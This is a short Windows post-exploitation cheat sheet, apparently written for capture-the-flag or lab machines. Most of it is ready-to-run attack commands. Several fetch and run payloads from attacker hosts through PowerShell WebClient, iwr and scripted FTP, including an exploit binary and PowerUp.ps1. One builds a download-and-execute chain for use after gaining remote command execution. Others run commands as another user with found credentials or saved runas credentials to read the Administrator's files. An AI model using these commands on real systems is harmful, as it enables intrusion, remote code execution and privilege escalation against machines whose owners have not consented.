Windows Tricks

Download a file using CMD using Powershell

echo $webclient = New-Object System.Net.WebClient >>wget.ps1
echo $url = "http://10.10.14.10/chimichurri.exe" >>wget.ps1
echo $file = "exploit.exe" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1

Transfer Files using FTP

echo open 10.10.14.8 >> $FILE_NAME & echo asdf >> $FILE_NAME & echo USER anonymous >> $FILE_NAME & echo PASS password >> $FILE_NAME & echo get exploit.exe >> $FILE_NAME & echo bye >> $FILE_NAME
ftp -ns:$FILE_NAME

If you get a CMD RCE use this to make a PS1 file that can download other files.

cmd.exe /c "@echo open 10.10.14.8>script.txt&@echo anonymous>>script.txt&@echo password>>script.txt&@echo get script.ps1>>script.txt&@echo bye>>script.txt&@ftp -ns:script.txt&@powershell.exe -File script.ps1"

Show hidden files

attrib -s -h -r /s /d *.*

Show files from alternate data sources

dir /R

View files from the alternate source

more < $FILE_PATH

Runas command

runas /savecred /user:$MACHINE_NAME\$USER_NAME "cmd /c COMMAND GOES HERE"

Use found credentials to run commands as user

$Username = 'USER_NAME'
$Password = 'PASSWORD'
$pass = ConvertTo-SecureString -AsPlainText $Password -Force
$Cred = New-Object System.Management.Automation.PSCredential -ArgumentList $Username,$pass
‚Äč
Invoke-Command -ComputerName $MACHINE_NAME -Credential $Cred -ScriptBlock { type C:\Users\Administrator\Desktop\root.txt }

Download a file using PowerShell

powershell -command "& { iwr http://10.10.14.13/PowerUp.ps1 -OutFile PowerUp.ps1 }"

Import a module from a different location

Import-Module -Name C:\Users\mssql-svc\modules\PowerUp.ps1 -Verbose